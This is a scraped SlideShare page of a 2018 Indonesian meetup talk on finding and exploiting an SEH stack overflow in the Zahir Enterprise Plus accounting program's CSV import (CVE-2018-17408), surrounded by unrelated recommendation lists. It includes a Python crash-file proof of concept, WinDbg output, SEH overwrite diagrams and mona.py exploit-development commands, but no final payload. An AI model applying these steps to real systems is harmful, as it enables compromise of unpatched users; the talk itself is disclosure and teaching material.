SlideShare uma empresa Scribd logo

Blinded Stack Overflow: Just Another Common Technique

Thomas Gregory
Thomas Gregory

This presentation was presented during the Indonesian Bug Hunter Lounge first meetup, Sept 28, 2018.

Tecnologia
1 de 25
Baixar para ler offline
Blinded Stack Overflow Exploit: Just Another Common Technique Thomas Gregory | Director and Partner at PT Spentera tom@spentera.id | @modpr0be Indonesian Bug Hunter Lounge Meetup 2018
Who we are2 • Marie Muhammad • Security researcher • Penetration tester and Red team operator • Bug hunter • Hold OSCP, OSCE, CRTE • marie@spentera.id • @f3ci • Found the 0day • Thomas Gregory • Director and Partner at Spentera • Cybersecurity Consultant • Vulnerability Discovery and 0day Exploit Development • Vulnerability Assessment and Penetration Testing • Metasploit framework exploit developer • Hold OSCP, OSCE, ISO 27001:2013 LA • tom@spentera.id • @modpr0be • Just exploiting further
Agenda3
What4
Zahir Enterprise plus 6.05
Why6
How7
Fuzzing: Identifying Entry point8 • Zahir is a desktop client application, one of the identifying entry point approach is file format fuzzing. • Identifying entry points: • Menu Buka Data, a function to read from a local database or Firebird database. • Menu Membuka File Backup, a function to open an existing backup • Menu Import Data dari Zahir versi 6.0, a menu to open data from previous Zahir version. • Menu Import Data dari file lainnya, a menu to open data from CSV format file. • Menu Import Transaksi, a menu to open data from CSV format file.
Fuzzing: Accidentally crashed!9
Simple code to crash10 #!/usr/bin/python junk = "A" * 2500 junk += 'nr’ # this is the CR/LF junk += 'A' * 500 junk += "D" * 500 print "[+] Preparing for file.." filename = "junk.csv" f = open(filename, 'w') print "[+] Writing crafted CSV file.." f.write(junk) f.close() print "[+] File %s written successfully.. bring it to Mr. Zahir." %filename
Error and Crash11
Exception Handler Kicked in12
Replicate and Debug the app13
Failed: Anti debug implemented14
At this point15 Modify the main program to bypass the anti-debug function Catch and dump the crash info ! Analysis the crash dump
Crashdump analysis16
Catch the crash with procdump17 mkdir c:crashdump cd C:toolsSysinternalsSuite procdump.exe -ma -I C:crashdump
Analysis the crash with windbg18 File – Open Crash Dump
Analysis the crash with windbg19 0:000> d 0012ec30 0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0:000> !exchain
How SEH works20 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------+ +----------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler| +------------------------------+ +--------+ +----------+ +--------+ +----------+ Junk / buffer ^ | | | | | +-----------+ (2) SE Handler membawa kembali ke alamat SEH berikutnya
How SEH exploit works21 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------------------------------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D| +------------------------------+ +--------+ +----------+ +--------------------------------+ Junk / buffer ^ | Shellcode | |POP REG | |POP REG | |RETN | | +-----------+(2) POP POP RET membawa kembali ke next SEH
Mona help during the exploit development22 # Load mona.py into WinDBG 0:000> .load pykd.pyd # Same as Metasploit pattern_create.rb and pattern_offset.rb 0:000> !py mona pc 0:000> !py mona po <offset> # Compare memory for bad characters 0:000> !py mona ba -cpb ‘x00’ 0:000> !py mona cmp -f bytearray.bin -a <start address>
Exploit FTW! Demo exploitation process.. 23
aftermath • Mitigation • Don't process files with CSV extension from untrusted parties, • Double check if trusted parties provide files with CSV extension, • Always update the operating system and your endpoint security. • Solution • There is no solution from Zahir at the moment. • Vulnerability report • Zahir was contacted but no security related response. • Submitted to National Cyber Security Operation Center under Indonesia National Cyber and Encryption Agency (BSSN) • Assigned CVE 2018-17408 24
Thank you Thomas Gregory Director and Partner at PT Spentera tom@spentera.id 25

Recomendados

Ak13 add shelf
Ak13 add shelfAk13 add shelf
Ak13 add shelf
Accenture
 
Ak12 adding shelf
Ak12 adding shelfAk12 adding shelf
Ak12 adding shelf
Accenture
 
Async programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - esAsync programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - es
Darío Kondratiuk
 
Learnings from govuk
Learnings from govukLearnings from govuk
Learnings from govuk
Gareth Rushgrove
 
computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)
Nitish Yadav
 
BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)
Daniel Raines Communications / BreeCS Software
 
Phaladeepika - appendix 3
Phaladeepika - appendix 3 Phaladeepika - appendix 3
Phaladeepika - appendix 3
Mullappilly
 
Real
RealReal
Real
Joshua Silver
 

Recomendados

Ak13 add shelf
Ak13 add shelfAk13 add shelf
Ak13 add shelf
Accenture
 
Ak12 adding shelf
Ak12 adding shelfAk12 adding shelf
Ak12 adding shelf
Accenture
 
Async programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - esAsync programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - es
Darío Kondratiuk
 
Learnings from govuk
Learnings from govukLearnings from govuk
Learnings from govuk
Gareth Rushgrove
 
computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)
Nitish Yadav
 
BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)
Daniel Raines Communications / BreeCS Software
 
Phaladeepika - appendix 3
Phaladeepika - appendix 3 Phaladeepika - appendix 3
Phaladeepika - appendix 3
Mullappilly
 
Real
RealReal
Real
Joshua Silver
 
Automated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAutomated Server Administration for DevSecOps
Automated Server Administration for DevSecOps
Aarno Aukia
 
Refactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressRefactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPress
Luca Tumedei
 
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
Santiago Bassett
 
MySQL document_store
MySQL document_storeMySQL document_store
MySQL document_store
Giuseppe Maxia
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hoster
Combell NV
 
Your admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXYour admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DX
Daniel Stange
 
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýOSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
NETWAYS
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance Schema
Mark Leith
 
Quick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEQuick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATE
Connie New
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
Combell NV
 
Development Workflows on AWS
Development Workflows on AWSDevelopment Workflows on AWS
Development Workflows on AWS
Amazon Web Services
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
Roland Bouman
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
Roland Bouman
 
Spring MVC - The Basics
Spring MVC - The BasicsSpring MVC - The Basics
Spring MVC - The Basics
Ilio Catallo
 
How to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressHow to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPress
Otto Kekäläinen
 
Creating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneCreating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with Chaperone
Gary Wisniewski
 
20150423 m3
20150423 m320150423 m3
20150423 m3
Kazuaki Matsuo
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 
Hitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsHitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning tools
Bjoern Rost
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
 

Mais conteúdo relacionado

Semelhante a Blinded Stack Overflow: Just Another Common Technique

Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
Combell NV
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
Roland Bouman
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
Roland Bouman
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 

Semelhante a Blinded Stack Overflow: Just Another Common Technique (20)

Automated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAutomated Server Administration for DevSecOps
Automated Server Administration for DevSecOps
 
Refactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressRefactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPress
 
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
MySQL document_store
MySQL document_storeMySQL document_store
MySQL document_store
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hoster
 
Your admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXYour admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DX
 
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýOSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance Schema
 
Quick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEQuick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATE
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Development Workflows on AWS
Development Workflows on AWSDevelopment Workflows on AWS
Development Workflows on AWS
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
 
Spring MVC - The Basics
Spring MVC - The BasicsSpring MVC - The Basics
Spring MVC - The Basics
 
How to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressHow to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPress
 
Creating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneCreating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with Chaperone
 
20150423 m3
20150423 m320150423 m3
20150423 m3
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Hitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsHitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning tools
 

Último

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 

Último (20)

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 

Blinded Stack Overflow: Just Another Common Technique

  • 1. Blinded Stack Overflow Exploit: Just Another Common Technique Thomas Gregory | Director and Partner at PT Spentera tom@spentera.id | @modpr0be Indonesian Bug Hunter Lounge Meetup 2018
  • 2. Who we are2 • Marie Muhammad • Security researcher • Penetration tester and Red team operator • Bug hunter • Hold OSCP, OSCE, CRTE • marie@spentera.id • @f3ci • Found the 0day • Thomas Gregory • Director and Partner at Spentera • Cybersecurity Consultant • Vulnerability Discovery and 0day Exploit Development • Vulnerability Assessment and Penetration Testing • Metasploit framework exploit developer • Hold OSCP, OSCE, ISO 27001:2013 LA • tom@spentera.id • @modpr0be • Just exploiting further
  • 8. Fuzzing: Identifying Entry point8 • Zahir is a desktop client application, one of the identifying entry point approach is file format fuzzing. • Identifying entry points: • Menu Buka Data, a function to read from a local database or Firebird database. • Menu Membuka File Backup, a function to open an existing backup • Menu Import Data dari Zahir versi 6.0, a menu to open data from previous Zahir version. • Menu Import Data dari file lainnya, a menu to open data from CSV format file. • Menu Import Transaksi, a menu to open data from CSV format file.
  • 10. Simple code to crash10 #!/usr/bin/python junk = "A" * 2500 junk += 'nr’ # this is the CR/LF junk += 'A' * 500 junk += "D" * 500 print "[+] Preparing for file.." filename = "junk.csv" f = open(filename, 'w') print "[+] Writing crafted CSV file.." f.write(junk) f.close() print "[+] File %s written successfully.. bring it to Mr. Zahir." %filename
  • 13. Replicate and Debug the app13
  • 14. Failed: Anti debug implemented14
  • 15. At this point15 Modify the main program to bypass the anti-debug function Catch and dump the crash info ! Analysis the crash dump
  • 17. Catch the crash with procdump17 mkdir c:crashdump cd C:toolsSysinternalsSuite procdump.exe -ma -I C:crashdump
  • 18. Analysis the crash with windbg18 File – Open Crash Dump
  • 19. Analysis the crash with windbg19 0:000> d 0012ec30 0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0:000> !exchain
  • 20. How SEH works20 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------+ +----------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler| +------------------------------+ +--------+ +----------+ +--------+ +----------+ Junk / buffer ^ | | | | | +-----------+ (2) SE Handler membawa kembali ke alamat SEH berikutnya
  • 21. How SEH exploit works21 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------------------------------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D| +------------------------------+ +--------+ +----------+ +--------------------------------+ Junk / buffer ^ | Shellcode | |POP REG | |POP REG | |RETN | | +-----------+(2) POP POP RET membawa kembali ke next SEH
  • 22. Mona help during the exploit development22 # Load mona.py into WinDBG 0:000> .load pykd.pyd # Same as Metasploit pattern_create.rb and pattern_offset.rb 0:000> !py mona pc 0:000> !py mona po <offset> # Compare memory for bad characters 0:000> !py mona ba -cpb ‘x00’ 0:000> !py mona cmp -f bytearray.bin -a <start address>
  • 24. aftermath • Mitigation • Don't process files with CSV extension from untrusted parties, • Double check if trusted parties provide files with CSV extension, • Always update the operating system and your endpoint security. • Solution • There is no solution from Zahir at the moment. • Vulnerability report • Zahir was contacted but no security related response. • Submitted to National Cyber Security Operation Center under Indonesia National Cyber and Encryption Agency (BSSN) • Assigned CVE 2018-17408 24
  • 25. Thank you Thomas Gregory Director and Partner at PT Spentera tom@spentera.id 25